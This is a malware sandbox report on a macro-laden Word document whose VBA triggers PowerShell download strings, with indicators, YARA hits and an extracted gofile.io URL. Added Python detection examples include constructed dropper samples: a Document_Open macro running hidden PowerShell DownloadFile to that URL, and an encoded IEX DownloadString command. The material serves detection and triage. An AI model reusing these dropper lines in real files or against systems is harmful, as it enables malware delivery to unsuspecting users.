DYNAMIC ANALYSIS REPORT #1591761

Classifications: -

Verdict: MALICIOUS

Threat Names: VB.Heur2.PwShell.2.2D752CDE.Gen

Verdict Reason: -

Sample Type Word Document

Sample Name Test.doc

ID #590902

MD5 5d2ceee3e928463210ccbc8ee0b0e3e8

SHA1 701fd88acbd550d3f75f24a15ef6c3a5110bf859

SHA256 95fce78393454133357863709111d7e92f363d0016bd995259741c1fd1c60190

File Size 32.50 KB

Report Created 2021-06-04 23:05 (UTC+2)

Target Environment win10_64_th2_en_mso2016 | ms_office

X-Ray Vision for Malware - www.vmray.com 1 / 12 DYNAMIC ANALYSIS REPORT #1591761

OVERVIEW

VMRay Threat Identifiers (7 rules, 8 matches)

Score | Category   | Operation                                        | Count | Classification
4/5   | Execution  | Document tries to create process                 | 1     | -
        • Document unsuccessfully tries to create process "winword.exe".
4/5   | Antivirus  | Malicious content was detected by heuristic scan | 1     | -
        • Built-in AV detected the sample itself as "VB.Heur2.PwShell.2.2D752CDE.Gen".
4/5   | YARA       | Malicious content matched by YARA rules          | 2     | -
        • Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched on the sample itself.
        • Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched on the function strings for (process #1) winword.exe.
2/5   | Execution  | Office macro uses an execute function            | 1     | -
        • Office macro uses the shell function.
2/5   | Execution  | Executes macro on specific event                 | 1     | -
        • Executes macro automatically on target "document" and event "open".
1/5   | Execution  | Contains suspicious Office macro                 | 1     | -
        • Office document contains a suspicious VBA macro.
1/5   | Heuristics | Contains suspicious meta data                    | 1     | -
        • Office document contains below average content data.


Mitre ATT&CK Matrix

Tactic columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact

Matched techniques:
  Execution        T1064 Scripting
  Defense Evasion  T1064 Scripting
  (no matches in the remaining tactic columns)

Note: T1064 was deprecated by MITRE and folded into T1059 Command and Scripting Interpreter; when correlating this report against a current ATT&CK version, map it to T1059.005 (Visual Basic) for the VBA macro and T1059.001 (PowerShell) for the download command it carries.


Sample Information

ID 1591761

MD5 5d2ceee3e928463210ccbc8ee0b0e3e8

SHA1 701fd88acbd550d3f75f24a15ef6c3a5110bf859

SHA256 95fce78393454133357863709111d7e92f363d0016bd995259741c1fd1c60190

SSDeep 384:wuE8iSwvxjk+ty1yxfsyog0jVAta/J1T3Ah:Xqxw+tjsACzT3A

ImpHash - (import hashes are only computed for PE files, not Word documents)

Filename Test.doc

File Size 32.50 KB

Sample Type Word Document

Has Macros Yes

Analysis Information

Creation Time 2021-06-04 23:05 (UTC+2)

Analysis Duration 00:04:10

Termination Reason Timeout

Number of Monitored Processes 1

Execution Successful False

Reputation Analysis Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 1

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 2


Screenshots truncated.


NETWORK

General

0 bytes total sent

0 bytes total received

0 ports

0 contacted IP addresses

1 URL extracted

0 files downloaded

0 malicious hosts detected

DNS

0 DNS requests for 0 domains

0 nameservers contacted

0 total requests returned errors

HTTP/S

0 URLs contacted, 0 servers

0 sessions, 0 bytes sent, 0 bytes received

DNS Requests

-

HTTP Requests

Method | URL                                                                                  | Dest. IP | Dest. Port | Status Code | Response Size | Verdict
GET    | https://srv-store2.gofile.io/download/b8ce20ad-dfc1-4aec-b020-65ab7ded29cb/calc.exe | -        | -          | -           | 0 bytes       | N/A

This entry is the one URL the report lists as extracted; it was never contacted. No destination IP, port or status code was recorded, and the totals above show 0 sessions and 0 contacted IP addresses, which is consistent with the failed process creation noted in the VTI section.


BEHAVIOR

Process Graph

#1 Sample Start winword.exe


Process #1: winword.exe

ID 1

Filename c:\program files (x86)\microsoft office\root\office16\winword.exe

Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time 78654 (ms), Reason: Analysis Target

Unmonitor End Time 329328 (ms), Reason: Terminated by Timeout

Monitor Duration 250.67s

Return Code Unknown

PID 3472

Parent PID 2104

Bitness 32 Bit

Host Behavior

Type     | Count
Module   | 2
Keyboard | 1
Process  | 1
Registry | 4
-        | 2
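The process graph above contains a single monitored process because the macro's Shell call never produced a child. On an endpoint where it does, the Office parent to script-host child relationship is the most reliable thing to alert on, with the command line adding weight. The following Python is an added example for this page, not VMRay's own detection logic: it scores constructed Sysmon Event ID 1 (process creation) records. Event #1 reuses the report's winword.exe command line and PIDs (3472, parent 2104); its parent image (explorer.exe) and every other event, including the powershell.exe child that carries the report's extracted URL, are assumptions made for the example.

```python
"""Process-creation detection for an Office process starting a child.
Added example for this page (not VMRay's logic); events are constructed."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# Download primitives or a URL on the child's command line.
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer|https?://", re.I)
# Hidden window, profile/policy bypass, or an encoded (base64 UTF-16LE) command.
EVASION_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|ep\s+bypass|executionpolicy\s+bypass|"
    r"e[a-z]*\s+[A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict):
    """Score one process-creation event; None when it is not a suspicious Office child."""
    parent = basename(event.get("ParentImage", ""))
    if parent not in OFFICE_PARENTS:
        return None
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    if child in SCRIPT_HOSTS:
        score += 3
        reasons.append(f"{parent} spawned {child}")
    if DOWNLOAD_RE.search(cmdline):
        score += 2
        reasons.append("download primitive or URL in command line")
    if EVASION_RE.search(cmdline):
        score += 1
        reasons.append("hidden window / encoded command / policy bypass switches")
    if not score:
        return None
    return {"pid": event.get("ProcessId"), "parent": parent, "child": child,
            "score": min(score, 5), "reasons": reasons}


def scan(events):
    """Alerts for every event that evaluate() scores."""
    return [alert for alert in map(evaluate, events) if alert]


# Constructed events.  #1 mirrors this report's only monitored process (PID 3472,
# parent PID 2104; the parent image is an assumption).  #2-#4 are hypothetical
# children a successful Shell call could have produced; #3 is a benign helper
# 32-bit Office commonly starts, kept as a true negative.
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"ProcessId": 3472, "ParentProcessId": 2104, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": WINWORD, "CommandLine": f'"{WINWORD}" /n'},
    {"ProcessId": 4100, "ParentProcessId": 3472, "ParentImage": WINWORD,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                    "'https://srv-store2.gofile.io/download/b8ce20ad-dfc1-4aec-b020-65ab7ded29cb/calc.exe',"
                    "$env:TEMP+'\\c.exe')"},
    {"ProcessId": 4120, "ParentProcessId": 3472, "ParentImage": WINWORD,
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe"},
    {"ProcessId": 4130, "ParentProcessId": 3472, "ParentImage": WINWORD,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The 32-bit powershell.exe path under SysWOW64 is deliberate: the report records winword.exe as a 32-bit process, so any child it spawns on the 64-bit analysis VM comes from the WOW64 tree, which is itself a useful field to key on.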


ARTIFACTS

File

SHA256                                                           | Filenames                              | Category    | Filesize | MIME Type          | Operations | Verdict
95fce78393454133357863709111d7e92f363d0016bd995259741c1fd1c60190 | C:\Users\RDhJ0CNFevzX\Desktop\Test.doc | Sample File | 32.50 KB | application/msword | -          | MALICIOUS

Filename

Filename    | Category      | Operations   | Verdict
WINHELP.INI | Accessed File | Read, Access | CLEAN

URL

URL                                                                                  | Category | IP Address | Country | HTTP Methods | Verdict
https://srv-store2.gofile.io/download/b8ce20ad-dfc1-4aec-b020-65ab7ded29cb/calc.exe | -        | -          | -       | GET          | CLEAN

Domain

Domain               | IP Address | Country | Protocols | Verdict
srv-store2.gofile.io | -          | -       | HTTPS     | CLEAN

The CLEAN verdicts on the URL and domain are reputation results only: the report records 0 files downloaded and 0 sessions, so the payload behind this URL was never inspected. Treat the URL as a download-stage indicator of this sample, not as cleared infrastructure.

IP

-

Email

-

Email Address

-

Mutex

-

Registry

Registry Key                                          | Operations | Parent Process Name | Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows           | access     | winword.exe         | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\HTML Help | access     | winword.exe         | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Help      | access     | winword.exe         | CLEAN

Process

Process Name | Commandline                                                                | Verdict
winword.exe  | "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n     | CLEAN


YARA / AV

YARA (2)

Ruleset Name | Rule Name                    | Rule Description                                                      | File Type        | Filename                               | Classification | Verdict
Generic      | PowerShell_Download_Commands | PowerShell may attempt to download external content; possible dropper | Sample File      | C:\Users\RDhJ0CNFevzX\Desktop\Test.doc | -              | 4/5
Generic      | PowerShell_Download_Commands | PowerShell may attempt to download external content; possible dropper | Function Strings | function_strings_process_1.txt         | -              | 4/5
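The Overview's VTI findings (macro runs on document open, uses the shell function, carries PowerShell download strings) and the two PowerShell_Download_Commands matches above are exactly the indicators a static macro triage picks up before detonation, which matters here because detonation failed and produced no network traffic. The following Python is an added example written for this page, not VMRay's rule or code. The VBA it scans is constructed for illustration and is not the macro from Test.doc (the report does not reproduce it); only the URL is the one the report extracted. It goes one step beyond the report's string match: split literals ("Down" & "loadFile") are joined and a -EncodedCommand payload is base64/UTF-16LE decoded before matching, because either trick defeats a plain string rule.

```python
"""Static triage of extracted VBA source for auto-execute entry points, execute
functions and PowerShell download commands.  Added example for this page; not
VMRay's rule logic, and the VBA samples are constructed, not from Test.doc."""
import base64
import re

# Entry points Word/Excel run without user interaction beyond opening the file.
AUTO_EXEC_RE = re.compile(
    r"\b(?:AutoOpen|AutoExec|AutoClose|AutoNew|Auto_Open|Auto_Close|Document_Open|"
    r"Document_Close|Document_New|Workbook_Open|Workbook_Close)\b", re.I)
# Functions that hand control to another program.
EXEC_FUNC_RE = re.compile(
    r"\b(?:Shell|ShellExecute|CreateObject)\b|\bWScript\.Shell\b|\.(?:Run|Exec)\b", re.I)
# PowerShell/.NET download primitives: the string class a
# "PowerShell_Download_Commands"-style YARA rule keys on.
PS_DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|"
    r"Start-BitsTransfer|Net\.WebClient|Net\.WebRequest|bitsadmin|\biwr\b|\bwget\b|\bcurl\b",
    re.I)
URL_RE = re.compile(r"https?://[^\s\"'()<>]+", re.I)
# "Down" & "loadFile" literal splitting, optionally across a " _" line continuation.
CONCAT_RE = re.compile(r'"\s*[&+]\s*(?:_\s*)?"')
# powershell -e / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def normalize(src: str) -> str:
    """Join split string literals and decode -EncodedCommand payloads so that
    obfuscated download commands are visible to the pattern scan."""
    text = CONCAT_RE.sub("", src)
    decoded = []
    for blob in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16le", "ignore"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return text + "\n" + "\n".join(decoded)


def triage_vba(src: str) -> dict:
    """Return the indicators found in VBA source plus a simple additive 0-5 score."""
    text = normalize(src)
    findings = {
        "auto_exec": sorted({m.group(0) for m in AUTO_EXEC_RE.finditer(text)}),
        "exec_funcs": sorted({m.group(0) for m in EXEC_FUNC_RE.finditer(text)}),
        "download_cmds": sorted({m.group(0) for m in PS_DOWNLOAD_RE.finditer(text)}),
        "urls": sorted(set(URL_RE.findall(text))),
    }
    score = 0
    if findings["auto_exec"]:
        score += 2   # runs as soon as the document is opened
    if findings["exec_funcs"]:
        score += 1   # hands control to another program
    if findings["download_cmds"]:
        score += 2   # fetches a second stage: dropper behaviour
    findings["score"] = min(score, 5)
    return findings


# Constructed VBA for illustration: NOT the macro in Test.doc (the report does
# not reproduce it).  Only the URL is the one the report extracted.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -w hidden -c ""(New-Object Net.WebClient).Down" & _
          "loadFile('https://srv-store2.gofile.io/download/b8ce20ad-dfc1-4aec-b020-65ab7ded29cb/calc.exe', $env:TEMP + '\c.exe')"""
    Shell cmd, vbHide
End Sub
'''

# Second constructed sample: the same class of download hidden behind -enc
# (hypothetical host name).
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s1')"
SAMPLE_VBA_ENCODED = (
    "Sub AutoOpen()\n"
    '    Shell "powershell -nop -enc '
    + base64.b64encode(_SCRIPT.encode("utf-16le")).decode() + '", vbHide\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for name, src in (("plain", SAMPLE_VBA), ("encoded", SAMPLE_VBA_ENCODED)):
        print(name, triage_vba(src))
```

In practice the input is the VBA source pulled out of the OLE file with an extractor such as olevba; the scan itself is format-agnostic, so the same function can be pointed at the function-strings dump the report's second YARA match refers to.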

Antivirus (1)

File Type | Threat Name                     | Filename                               | Verdict
SAMPLE    | VB.Heur2.PwShell.2.2D752CDE.Gen | C:\Users\RDhJ0CNFevzX\Desktop\Test.doc | MALICIOUS


ENVIRONMENT

Virtual Machine Information

Name win10_64_th2_en_mso2016

Description win10_64_th2_en_mso2016

Architecture x86 64-bit

Operating System Windows 10 Threshold 2 (build 10586)

Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)

Network Scheme Name Local Gateway

Network Config Name Local Gateway

Analyzer Information

Analyzer Version 4.1.1

Dynamic Engine Version 4.1.1 / 02/08/2021 15:19

Static Engine Version 1.6.0

Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)

Built-in AV Database Update Release Date 2021-06-04 14:57:36+00:00

VTI Ruleset Version 3.8

YARA Built-in Ruleset Version 1.5

Analysis Report Layout Version 10

Software Information

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

Microsoft Office Version 16.0.4266.1003

Internet Explorer Version 11.0.10586.0

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed
